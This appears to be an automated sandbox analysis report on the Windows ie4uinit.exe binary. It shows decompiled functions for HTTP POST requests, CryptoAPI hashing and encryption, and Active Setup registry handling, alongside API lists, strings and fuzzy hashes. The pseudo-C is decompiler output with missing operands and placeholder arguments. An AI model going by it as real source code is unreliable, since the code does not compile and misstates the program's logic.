				_t76 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t106 + 0x2260) = _t76 ^ _t109;
				r15d = r9d;
				r9d = 0;
				 *((intOrPtr*)(_t109 + 0x40)) = 0x824;
				__imp__InternetCanonicalizeUrlW(_t105);
				r13d = 0;
				if (_t39 == 0) goto 0x319d6d8e;
				_t8 = _t121 + 0x68; // 0x68
				_t63 = _t8;
				r8d = _t63;
				_t40 = memset(_t126, _t123, _t121);
				 *((long long*)(_t109 + 0x68)) = _t106 - 0x40;
				_t79 = _t106 + 0x1c0;
				 *(_t109 + 0x50) = _t63;
				r8d = 0;
				 *((long long*)(_t106 - 0x68)) = _t79;
				 *((intOrPtr*)(_t106 - 0x40)) = r13w;
				 *((intOrPtr*)(_t109 + 0x70)) = 0x100;
				 *((intOrPtr*)(_t106 + 0x1c0)) = r13w;
				 *((intOrPtr*)(_t106 - 0x60)) = 0x824;
				__imp__InternetCrackUrlW();
				if (_t40 == 0) goto 0x319d6d8e;
				r9d = 0;
				 *(_t109 + 0x20) = r13d;
				r8d = 0;
				__imp__InternetOpenW();
				if (_t79 == 0) goto 0x319d6d8e;
				r8d =  *(_t109 + 0x74) & 0x0000ffff;
				 *(_t109 + 0x38) = _t121;
				r9d = 0;
				 *((intOrPtr*)(_t109 + 0x30)) = 0x200;
				 *(_t109 + 0x28) = 3;
				 *(_t109 + 0x20) = _t121;
				__imp__InternetConnectW();
				if (_t79 == 0) goto 0x319d6d6f;
				 *(_t109 + 0x38) = _t121;
				_t59 =  ==  ? 0xe80100 : 0x680100;
				r9d = 0;
				 *((intOrPtr*)(_t109 + 0x30)) =  ==  ? 0xe80100 : 0x680100;
				 *(_t109 + 0x28) = _t121;
				 *(_t109 + 0x20) = _t121;
				__imp__HttpOpenRequestW();
				if (_t79 == 0) goto 0x319d6d50;
				r9d = r15d;
				 *(_t109 + 0x20) =  *((intOrPtr*)(_t106 + 0x22d0));
				E00007FF77FF7319D6DD0(0xe80100, _t63, __r8, _t79, _t79, _t79, _t79, __r8, _t118, _t99, _t102);
				__imp__InternetCloseHandle();
				goto 0x319d6d64;
				_t51 =  <=  ? GetLastError() : _t43 & 0x0000ffff | 0x80070000;
				__imp__InternetCloseHandle();
				goto 0x319d6d83;
				_t54 =  <=  ? GetLastError() : _t44 & 0x0000ffff | 0x80070000;
				__imp__InternetCloseHandle();
				goto 0x319d6da2;
				_t45 = GetLastError();
				_t57 =  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
				_t46 =  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
				return E00007FF77FF7319E38D0( <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000,  ==  ? 0xe80100 : 0x680100,  *(_t106 + 0x2260) ^ _t109);
			}

0x7ff7319d6bb4
0x7ff7319d6bc4
0x7ff7319d6bd1
0x7ff7319d6bd6
0x7ff7319d6bd9
0x7ff7319d6be3
0x7ff7319d6bf1
0x7ff7319d6c04
0x7ff7319d6c07
0x7ff7319d6c12
0x7ff7319d6c18
0x7ff7319d6c1d
0x7ff7319d6c23
0x7ff7319d6c23
0x7ff7319d6c29
0x7ff7319d6c31
0x7ff7319d6c3e
0x7ff7319d6c48
0x7ff7319d6c4f
0x7ff7319d6c53
0x7ff7319d6c56
0x7ff7319d6c61
0x7ff7319d6c66
0x7ff7319d6c6e
0x7ff7319d6c76
0x7ff7319d6c79
0x7ff7319d6c81
0x7ff7319d6c87
0x7ff7319d6c8a
0x7ff7319d6c8f
0x7ff7319d6c9b
0x7ff7319d6ca7
0x7ff7319d6cad
0x7ff7319d6cb7
0x7ff7319d6cbc
0x7ff7319d6cbf
0x7ff7319d6cca
0x7ff7319d6cd2
0x7ff7319d6cd7
0x7ff7319d6ce3
0x7ff7319d6cf5
0x7ff7319d6d0b
0x7ff7319d6d0e
0x7ff7319d6d11
0x7ff7319d6d18
0x7ff7319d6d1d
0x7ff7319d6d22
0x7ff7319d6d2e
0x7ff7319d6d30
0x7ff7319d6d33
0x7ff7319d6d3e
0x7ff7319d6d48
0x7ff7319d6d4e
0x7ff7319d6d61
0x7ff7319d6d67
0x7ff7319d6d6d
0x7ff7319d6d80
0x7ff7319d6d86
0x7ff7319d6d8c
0x7ff7319d6d8e
0x7ff7319d6d9f
0x7ff7319d6da2
0x7ff7319d6dcd

APIs

InternetCanonicalizeUrlW.WININET ref: 00007FF7319D6C12
memset.MSVCRT ref: 00007FF7319D6C31
InternetCrackUrlW.WININET ref: 00007FF7319D6C79
InternetOpenW.WININET ref: 00007FF7319D6C9B
InternetConnectW.WININET ref: 00007FF7319D6CD7
HttpOpenRequestW.WININET ref: 00007FF7319D6D22
InternetCloseHandle.WININET ref: 00007FF7319D6D48
GetLastError.KERNEL32 ref: 00007FF7319D6D50
InternetCloseHandle.WININET ref: 00007FF7319D6D67

Part of subcall function 00007FF7319D6DD0: SysAllocString.OLEAUT32 ref: 00007FF7319D6E04
Part of subcall function 00007FF7319D6DD0: SysStringLen.OLEAUT32 ref: 00007FF7319D6E19
Part of subcall function 00007FF7319D6DD0: HttpSendRequestW.WININET ref: 00007FF7319D6E2F
Part of subcall function 00007FF7319D6DD0: HttpQueryInfoW.WININET ref: 00007FF7319D6E5E
Part of subcall function 00007FF7319D6DD0: InternetReadFile.WININET ref: 00007FF7319D6EAB
Part of subcall function 00007FF7319D6DD0: GetLastError.KERNEL32 ref: 00007FF7319D6EB5
Part of subcall function 00007FF7319D6DD0: SysFreeString.OLEAUT32 ref: 00007FF7319D6F68
Part of subcall function 00007FF7319D6DD0: SysFreeString.OLEAUT32 ref: 00007FF7319D6F9A

GetLastError.KERNEL32 ref: 00007FF7319D6D6F
InternetCloseHandle.WININET ref: 00007FF7319D6D86
GetLastError.KERNEL32(?,00007FF7319D7274,?,?,?,?,?,?,?,?,?,?,?,?,?,80070057), ref: 00007FF7319D6D8E

Strings

IE_EUPP, xrefs: 00007FF7319D6C92
POST, xrefs: 00007FF7319D6CFA

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Internet$ErrorLastString$CloseHandleHttp$FreeOpenRequest$AllocCanonicalizeConnectCrackFileInfoQueryReadSendmemset
String ID: IE_EUPP$POST
API String ID: 1847757306-3869093421
Opcode ID: 3aa75398a8373df8bf6d18cd5c62d5d95269c300dcac9ed293b90aaa8e9a243e
Instruction ID: f16520e2bb2a3ed66441b8d35adceeff16fee802f841fbb4a4798e22dfeacd34
Opcode Fuzzy Hash: 3aa75398a8373df8bf6d18cd5c62d5d95269c300dcac9ed293b90aaa8e9a243e
Instruction Fuzzy Hash: A351A232E087C1A6E720EF65F8446AAA3A0FB88798F804135DE4D47A58DF7CD555D720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DEFAC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 94encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32(?,?,00000000,00007FF7319DEEDA), ref: 00007FF7319DEFE6
memset.MSVCRT ref: 00007FF7319DEFFF
CryptSetHashParam.ADVAPI32 ref: 00007FF7319DF01D
CryptHashData.ADVAPI32 ref: 00007FF7319DF035
CryptGetHashParam.ADVAPI32 ref: 00007FF7319DF05E
GetLastError.KERNEL32 ref: 00007FF7319DF073
GetLastError.KERNEL32 ref: 00007FF7319DF087
GetLastError.KERNEL32 ref: 00007FF7319DF096
CryptDestroyHash.ADVAPI32 ref: 00007FF7319DF0AF
GetLastError.KERNEL32(?,?,00000000,00007FF7319DEEDA), ref: 00007FF7319DF0B7
GetLastError.KERNEL32(?,?,00000000,00007FF7319DEEDA), ref: 00007FF7319DF0CB
GetLastError.KERNEL32(?,?,00000000,00007FF7319DEEDA), ref: 00007FF7319DF0DA

Strings

, xrefs: 00007FF7319DF068

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CryptHash$Param$CreateDataDestroymemset
String ID:
API String ID: 3852012595-3916222277
Opcode ID: 3bbd2b993c606e934eca1004046eac300e38a0ac95120dbaee498dca69c85d54
Instruction ID: 48475cb33319886b6e8e2faec7b93a2effef449dd004f69029fe0f42b6409d2c
Opcode Fuzzy Hash: 3bbd2b993c606e934eca1004046eac300e38a0ac95120dbaee498dca69c85d54
Instruction Fuzzy Hash: FD41E832F08686D6F750AB22D849769A3A4FF84F98F944134DA4D83658DFBCD846E730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C53B8 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 179
registrywindowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 29%

			E00007FF77FF7319C53B8(void* __eax, void* __ecx, signed int __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8, void* __r9, void* __r10, long long _a24, long long _a32) {
				void* _v40;
				signed int _v48;
				char _v80;
				char _v96;
				intOrPtr _v100;
				char _v104;
				signed int _v120;
				void* __rdi;
				void* __r14;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t48;
				int _t59;
				void* _t61;
				void* _t84;
				signed int _t85;
				signed long long _t100;
				void* _t131;
				void* _t137;
				void* _t140;
				void* _t141;
				void* _t145;

				_t141 = __r9;
				_t140 = __r8;
				_t104 = __rbx;
				_a24 = __rbx;
				_a32 = __rsi;
				_t100 =  *0x319f4658; // 0x8be7dd1f02a
				_v48 = _t100 ^ _t137 - 0x00000070;
				_t85 = __edx;
				_t61 = __ecx;
				r12d = 2;
				_t82 = r8d;
				__imp__CoInitializeEx();
				if (__eax < 0) goto 0x319c564e;
				if (__ecx != 0) goto 0x319c5410;
				if (E00007FF77FF7319C3578() != 0) goto 0x319c5648;
				r15d = 3;
				r8d = _t61;
				r14b = 0;
				E00007FF77FF7319C6B00();
				if (r8d != 0) goto 0x319c546b;
				r8d = _t61;
				E00007FF77FF7319C6B00();
				r8d = _t61;
				E00007FF77FF7319C6B00();
				r8d = 0;
				r8b = _t61 == 0;
				E00007FF77FF7319C6B00();
				E00007FF77FF7319C5300(_t61, r8d);
				if (_t61 == 0) goto 0x319c549f;
				E00007FF77FF7319C4968(__edx, __rbx);
				_v120 = _t85;
				r9d = 1;
				E00007FF77FF7319C3738(_t82, _t140);
				goto 0x319c5563;
				_v120 = _v120 & 0x00000000;
				r9d = 0;
				_t41 = E00007FF77FF7319C3738(_t82, _t140);
				r9d = 0;
				_v104 = 0x19;
				_t9 = _t141 + 1; // 0x1
				_t84 = _t9;
				r8d = _t84;
				_t42 = E00007FF77FF7319C4720(_t41, r12d, _t104,  &_v104);
				_t10 = _t131 + 0x16; // 0x17
				r14d = _t10;
				_v100 = 6;
				r9d = _t84;
				_v104 = r14d;
				r8d = r12d;
				_t43 = E00007FF77FF7319C4720(_t42, r12d, _t104,  &_v104);
				r9d = _t84;
				_v104 = r14d;
				r8d = _t84;
				_t16 = _t131 + 3; // 0x4
				_t44 = E00007FF77FF7319C4720(_t43, _t16, _t104,  &_v104);
				asm("movups xmm0, [0x249b7]");
				r9d = 0;
				r8d = _t84;
				asm("movdqu [ebp-0x38], xmm0");
				_t45 = E00007FF77FF7319C47AC(_t44, _t104,  &_v96, 0x80000002, _t140);
				asm("movups xmm0, [0x249ac]");
				r9d = _t84;
				r8d = r12d;
				asm("movups xmm1, [0x249cf]");
				asm("movdqu [ebp-0x28], xmm0");
				asm("movdqu [ebp-0x18], xmm1");
				_t48 = E00007FF77FF7319C5B2C(E00007FF77FF7319C481C(E00007FF77FF7319C47AC(_t45, _t104,  &_v80, 0x80000002, _t140), r14d, _t131),  &_v80);
				r14b = dil;
				if (E00007FF77FF7319C3694(_t48) != 0) goto 0x319c5617;
				if (_t61 == 0) goto 0x319c5584;
				if (E00007FF77FF7319C641C(_t49, _t104) != 0) goto 0x319c5594;
				_v120 = _v120 & 0x00000000;
				r9d = 0;
				E00007FF77FF7319C3738(_t82, _t140);
				E00007FF77FF7319C4F7C(_t82, E00007FF77FF7319C641C(_t49, _t104), _t104,  &_v80, _t131, 0x80000002, _t140, _t141, __r10, _t145);
				if (_t61 == 0) goto 0x319c5605;
				r9d = _t84;
				r8d = 0;
				_v120 =  &_v104;
				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0x319c55d0;
				E00007FF77FF7319C3860(_t104, L"Locale",  &_v104, 0x80000002);
				r9d = _t84;
				r8d = 0;
				_v120 =  &_v104;
				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0x319c560e;
				E00007FF77FF7319C3860(_t104, L"Version",  &_v104, 0x80000002);
				goto 0x319c560e;
				RegDeleteKeyW(??, ??);
				E00007FF77FF7319C3650(0);
				goto 0x319c5630;
				r8d = 0;
				_t59 = PostMessageW(??, ??, ??, ??);
				if (r14b == 0) goto 0x319c5648;
				r9d = 0;
				r8d = 0;
				SHChangeNotify(??, ??, ??, ??);
				__imp__CoUninitialize();
				return E00007FF77FF7319E38D0(_t59, 0x8000000, _v48 ^ _t137 - 0x00000070);
			}

0x7ff7319c53b8
0x7ff7319c53b8
0x7ff7319c53b8
0x7ff7319c53b8
0x7ff7319c53bd
0x7ff7319c53d1
0x7ff7319c53db
0x7ff7319c53df
0x7ff7319c53e1
0x7ff7319c53e3
0x7ff7319c53ee
0x7ff7319c53f1
0x7ff7319c53f9
0x7ff7319c5401
0x7ff7319c540a
0x7ff7319c5417
0x7ff7319c5420
0x7ff7319c5423
0x7ff7319c5426
0x7ff7319c542d
0x7ff7319c5436
0x7ff7319c543c
0x7ff7319c5448
0x7ff7319c544e
0x7ff7319c545a
0x7ff7319c5462
0x7ff7319c5466
0x7ff7319c546f
0x7ff7319c5476
0x7ff7319c547a
0x7ff7319c547f
0x7ff7319c548f
0x7ff7319c5495
0x7ff7319c549a
0x7ff7319c549f
0x7ff7319c54ae
0x7ff7319c54b1
0x7ff7319c54b6
0x7ff7319c54b9
0x7ff7319c54c7
0x7ff7319c54c7
0x7ff7319c54cb
0x7ff7319c54ce
0x7ff7319c54d3
0x7ff7319c54d3
0x7ff7319c54d7
0x7ff7319c54de
0x7ff7319c54e1
0x7ff7319c54e5
0x7ff7319c54ef
0x7ff7319c54f4
0x7ff7319c54f7
0x7ff7319c54fb
0x7ff7319c5502
0x7ff7319c5505
0x7ff7319c550a
0x7ff7319c5511
0x7ff7319c5518
0x7ff7319c551b
0x7ff7319c5520
0x7ff7319c5525
0x7ff7319c552c
0x7ff7319c552f
0x7ff7319c5532
0x7ff7319c553d
0x7ff7319c5542
0x7ff7319c555b
0x7ff7319c5560
0x7ff7319c556a
0x7ff7319c5579
0x7ff7319c5582
0x7ff7319c5584
0x7ff7319c5589
0x7ff7319c558f
0x7ff7319c5594
0x7ff7319c55a2
0x7ff7319c55a8
0x7ff7319c55ab
0x7ff7319c55ae
0x7ff7319c55be
0x7ff7319c55cb
0x7ff7319c55d4
0x7ff7319c55d7
0x7ff7319c55da
0x7ff7319c55f1
0x7ff7319c55fe
0x7ff7319c5603
0x7ff7319c5608
0x7ff7319c5610
0x7ff7319c5615
0x7ff7319c5617
0x7ff7319c562a
0x7ff7319c5633
0x7ff7319c5635
0x7ff7319c5638
0x7ff7319c5642
0x7ff7319c5648
0x7ff7319c5672

APIs

CoInitializeEx.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C25CC), ref: 00007FF7319C53F1
RegOpenKeyExW.ADVAPI32 ref: 00007FF7319C55B6
RegOpenKeyExW.ADVAPI32 ref: 00007FF7319C55E9
RegDeleteKeyW.ADVAPI32 ref: 00007FF7319C5608
PostMessageW.USER32 ref: 00007FF7319C562A
SHChangeNotify.SHELL32 ref: 00007FF7319C5642
CoUninitialize.OLE32 ref: 00007FF7319C5648

Part of subcall function 00007FF7319C3578: GetVersionExW.KERNEL32 ref: 00007FF7319C359E

Part of subcall function 00007FF7319C3738: RegCreateKeyExW.ADVAPI32 ref: 00007FF7319C378E
Part of subcall function 00007FF7319C3738: RegSetValueW.ADVAPI32 ref: 00007FF7319C3835
Part of subcall function 00007FF7319C3738: RegCloseKey.ADVAPI32 ref: 00007FF7319C3840

Part of subcall function 00007FF7319C4720: SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C4762

Part of subcall function 00007FF7319C47AC: SHGetKnownFolderPath.SHELL32(00007FF7319C25CC), ref: 00007FF7319C47D7
Part of subcall function 00007FF7319C47AC: CoTaskMemFree.OLE32 ref: 00007FF7319C47FA

Part of subcall function 00007FF7319C481C: SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C4851
Part of subcall function 00007FF7319C481C: GetModuleHandleW.KERNEL32 ref: 00007FF7319C4898
Part of subcall function 00007FF7319C481C: LoadStringW.USER32 ref: 00007FF7319C48AE
Part of subcall function 00007FF7319C481C: PathRemoveExtensionW.SHLWAPI ref: 00007FF7319C48B9
Part of subcall function 00007FF7319C481C: GetModuleHandleW.KERNEL32 ref: 00007FF7319C48F1
Part of subcall function 00007FF7319C481C: LoadStringW.USER32 ref: 00007FF7319C4907
Part of subcall function 00007FF7319C481C: PathRemoveExtensionW.SHLWAPI ref: 00007FF7319C4912

Part of subcall function 00007FF7319C5B2C: SHCreateItemFromParsingName.SHELL32 ref: 00007FF7319C5B40
Part of subcall function 00007FF7319C5B2C: CoCreateInstance.OLE32 ref: 00007FF7319C5B6A

Strings

Version, xrefs: 00007FF7319C55F7
shell:::{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF7319C5554
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}, xrefs: 00007FF7319C5599, 00007FF7319C55DF
Software\Clients\StartMenuInternet, xrefs: 00007FF7319C561A
Locale, xrefs: 00007FF7319C55C4

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Path$CreateFolder$ExtensionHandleLoadModuleOpenRemoveSpecialString$ChangeCloseDeleteFreeFromInitializeInstanceItemKnownMessageNameNotifyParsingPostTaskUninitializeValueVersion
String ID: Locale$Software\Clients\StartMenuInternet$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}$Version$shell:::{871C5380-42A0-1069-A2EA-08002B30309D}
API String ID: 3651604014-1396794569
Opcode ID: b2999dfcf064b39e6c9b9b5fe91f97da1f9eb3d234a2c6913081498dbea14266
Instruction ID: cb934394715dc8c73f6c851eab2a3c38cf41732284587e6b3c6bb6e7e607c11c
Opcode Fuzzy Hash: b2999dfcf064b39e6c9b9b5fe91f97da1f9eb3d234a2c6913081498dbea14266
Instruction Fuzzy Hash: A971B021F18692A2F710BB26E4416B9A764BF9875CFC05035DDCD13A99CEBCE505DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DF108 Relevance: 21.2, APIs: 14, Instructions: 164
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00007FF77FF7319DF108(void* __eax, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, signed int _a8, long long _a16, long long _a24, long long _a40, intOrPtr* _a48) {
				void* _v40;
				char _v56;
				intOrPtr _v72;
				long long _v80;
				long long _v88;
				signed int _t37;
				long _t40;
				long _t43;
				long _t45;
				long _t48;
				long _t50;
				long _t53;
				void* _t58;
				void* _t62;
				void* _t66;
				signed int _t78;
				void* _t80;
				signed int _t81;
				long long _t113;
				long long _t116;
				long long _t126;
				void* _t143;

				_t116 = __rbx;
				_a16 = __rbx;
				_a24 = __rbp;
				_t78 = r9d;
				r9d = 0;
				__imp__CryptSetKeyParam();
				if (__eax == 0) goto 0x319df2fe;
				_t126 = _a40;
				_t6 = _t116 + 0x10; // 0x10
				r14d = _t78;
				_v56 = _t6;
				r14d = r14d >> 4;
				_a8 = _t78 & 0x0000000f;
				if (r14d == 0) goto 0x319df1fd;
				_t80 = _t143 - 1;
				goto 0x319df17c;
				_v56 = 0x10;
				__imp__memcpy_s();
				_t37 = _a8;
				if (_t37 != 0) goto 0x319df1a6;
				if (0 != _t80) goto 0x319df1a6;
				goto 0x319df1af;
				if (_t37 != 0) goto 0x319df1bb;
				if (0 != _t80) goto 0x319df1bb;
				r8d = 1;
				goto 0x319df1be;
				r8d = 0;
				_v72 = 0x10;
				_t14 =  &_v56; // -117
				_t113 = _t14;
				r9d = 0;
				_v80 = _t113;
				_v88 = _t126;
				__imp__CryptEncrypt();
				if (_t37 == 0) goto 0x319df25a;
				if (1 - r14d < 0) goto 0x319df177;
				_t81 = _a8;
				if (_t81 == 0) goto 0x319df2e3;
				r9d = _t81;
				__imp__memcpy_s();
				_t21 =  &_a8; // -53
				_v72 = 0x10;
				r9d = 0;
				_v80 = _t21;
				r8d = 1;
				_v88 = _t126 + _t113;
				__imp__CryptEncrypt();
				if (_v56 == 0) goto 0x319df2a9;
				goto 0x319df2e3;
				_t40 = GetLastError();
				_t41 =  ==  ? 1 : _t40;
				_t98 =  ==  ? 1 : _t40;
				if (( ==  ? 1 : _t40) > 0) goto 0x319df27d;
				_t58 =  ==  ? 1 : GetLastError();
				goto 0x319df291;
				_t43 = GetLastError();
				_t44 =  ==  ? 1 : _t43;
				_t59 = ( ==  ? 1 : _t43) & 0x0000ffff;
				_t60 = ( ==  ? 1 : _t43) & 0x0000ffff | 0x80070000;
				 *((intOrPtr*)(__rcx + 8)) = 3;
				_t101 = ( ==  ? 1 : _t43) & 0x0000ffff | 0x80070000;
				if ((( ==  ? 1 : _t43) & 0x0000ffff | 0x80070000) < 0) goto 0x319df2f0;
				goto 0x319df202;
				_t45 = GetLastError();
				_t46 =  ==  ? 1 : _t45;
				_t103 =  ==  ? 1 : _t45;
				if (( ==  ? 1 : _t45) > 0) goto 0x319df2c7;
				_t62 =  ==  ? 1 : GetLastError();
				goto 0x319df2db;
				_t48 = GetLastError();
				_t49 =  ==  ? 1 : _t48;
				_t63 = ( ==  ? 1 : _t48) & 0x0000ffff;
				_t64 = ( ==  ? 1 : _t48) & 0x0000ffff | 0x80070000;
				 *((intOrPtr*)(__rcx + 8)) = 3;
				_t106 = ( ==  ? 1 : _t48) & 0x0000ffff | 0x80070000;
				if ((( ==  ? 1 : _t48) & 0x0000ffff | 0x80070000) < 0) goto 0x319df2f0;
				goto 0x319df2f2;
				 *_a48 = 0;
				goto 0x319df330;
				_t50 = GetLastError();
				_t51 =  ==  ? 0 : _t50;
				_t108 =  ==  ? 0 : _t50;
				if (( ==  ? 0 : _t50) > 0) goto 0x319df31c;
				_t66 =  ==  ? 0 : GetLastError();
				goto 0x319df330;
				_t53 = GetLastError();
				_t54 =  ==  ? 0 : _t53;
				_t67 = ( ==  ? 0 : _t53) & 0x0000ffff;
				_t68 = ( ==  ? 0 : _t53) & 0x0000ffff | 0x80070000;
				return ( ==  ? 0 : _t53) & 0x0000ffff | 0x80070000;
			}

0x7ff7319df108
0x7ff7319df108
0x7ff7319df10d
0x7ff7319df121
0x7ff7319df130
0x7ff7319df138
0x7ff7319df140
0x7ff7319df146
0x7ff7319df14e
0x7ff7319df151
0x7ff7319df154
0x7ff7319df15b
0x7ff7319df161
0x7ff7319df16b
0x7ff7319df171
0x7ff7319df175
0x7ff7319df17f
0x7ff7319df18c
0x7ff7319df192
0x7ff7319df19b
0x7ff7319df19f
0x7ff7319df1a4
0x7ff7319df1ad
0x7ff7319df1b1
0x7ff7319df1b3
0x7ff7319df1b9
0x7ff7319df1bb
0x7ff7319df1be
0x7ff7319df1c2
0x7ff7319df1c2
0x7ff7319df1cb
0x7ff7319df1ce
0x7ff7319df1d5
0x7ff7319df1da
0x7ff7319df1e2
0x7ff7319df1f4
0x7ff7319df1f6
0x7ff7319df204
0x7ff7319df20f
0x7ff7319df215
0x7ff7319df21f
0x7ff7319df227
0x7ff7319df22f
0x7ff7319df232
0x7ff7319df237
0x7ff7319df23c
0x7ff7319df241
0x7ff7319df249
0x7ff7319df255
0x7ff7319df25a
0x7ff7319df267
0x7ff7319df26a
0x7ff7319df26c
0x7ff7319df278
0x7ff7319df27b
0x7ff7319df27d
0x7ff7319df285
0x7ff7319df288
0x7ff7319df28b
0x7ff7319df291
0x7ff7319df299
0x7ff7319df29b
0x7ff7319df2a4
0x7ff7319df2a9
0x7ff7319df2b1
0x7ff7319df2b4
0x7ff7319df2b6
0x7ff7319df2c2
0x7ff7319df2c5
0x7ff7319df2c7
0x7ff7319df2cf
0x7ff7319df2d2
0x7ff7319df2d5
0x7ff7319df2db
0x7ff7319df2e3
0x7ff7319df2e5
0x7ff7319df2ee
0x7ff7319df2fa
0x7ff7319df2fc
0x7ff7319df2fe
0x7ff7319df306
0x7ff7319df309
0x7ff7319df30b
0x7ff7319df317
0x7ff7319df31a
0x7ff7319df31c
0x7ff7319df324
0x7ff7319df327
0x7ff7319df32a
0x7ff7319df34a

APIs

CryptSetKeyParam.ADVAPI32(00000000,00007FF7319DEEAD), ref: 00007FF7319DF138
memcpy_s.MSVCRT ref: 00007FF7319DF18C
CryptEncrypt.ADVAPI32 ref: 00007FF7319DF1DA
memcpy_s.MSVCRT ref: 00007FF7319DF215
CryptEncrypt.ADVAPI32 ref: 00007FF7319DF241
GetLastError.KERNEL32 ref: 00007FF7319DF25A
GetLastError.KERNEL32 ref: 00007FF7319DF26E
GetLastError.KERNEL32 ref: 00007FF7319DF27D
GetLastError.KERNEL32 ref: 00007FF7319DF2A9
GetLastError.KERNEL32 ref: 00007FF7319DF2B8
GetLastError.KERNEL32 ref: 00007FF7319DF2C7
GetLastError.KERNEL32 ref: 00007FF7319DF2FE
GetLastError.KERNEL32 ref: 00007FF7319DF30D
GetLastError.KERNEL32 ref: 00007FF7319DF31C

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Crypt$Encryptmemcpy_s$Param
String ID:
API String ID: 2866623800-0
Opcode ID: 08f6b4490a9e2db9937eaeb6c40603659467061f2b73c9a0b52fbdd1839e3ee7
Instruction ID: acf00c1ea5cd4cb014da5d3122c76e9e7246f45343aab08849b75b35efd881f5
Opcode Fuzzy Hash: 08f6b4490a9e2db9937eaeb6c40603659467061f2b73c9a0b52fbdd1839e3ee7
Instruction Fuzzy Hash: AF51A632F0C7C696E760AF66E85976AB794BF44B88F944034CE4983648DFACE405A760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CAC08 Relevance: 16.6, APIs: 11, Instructions: 138fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7319CAC70
#149.IERTUTIL ref: 00007FF7319CACD3
CloseHandle.KERNEL32 ref: 00007FF7319CACFB
GetLastError.KERNEL32 ref: 00007FF7319CAD03
wcscpy_s.MSVCRT ref: 00007FF7319CAD3B
wcscat_s.MSVCRT ref: 00007FF7319CAD51
FindFirstFileW.KERNEL32 ref: 00007FF7319CAD63
wcscat_s.MSVCRT ref: 00007FF7319CADBB
FindNextFileW.KERNEL32 ref: 00007FF7319CADF2
FindClose.KERNEL32 ref: 00007FF7319CAE01
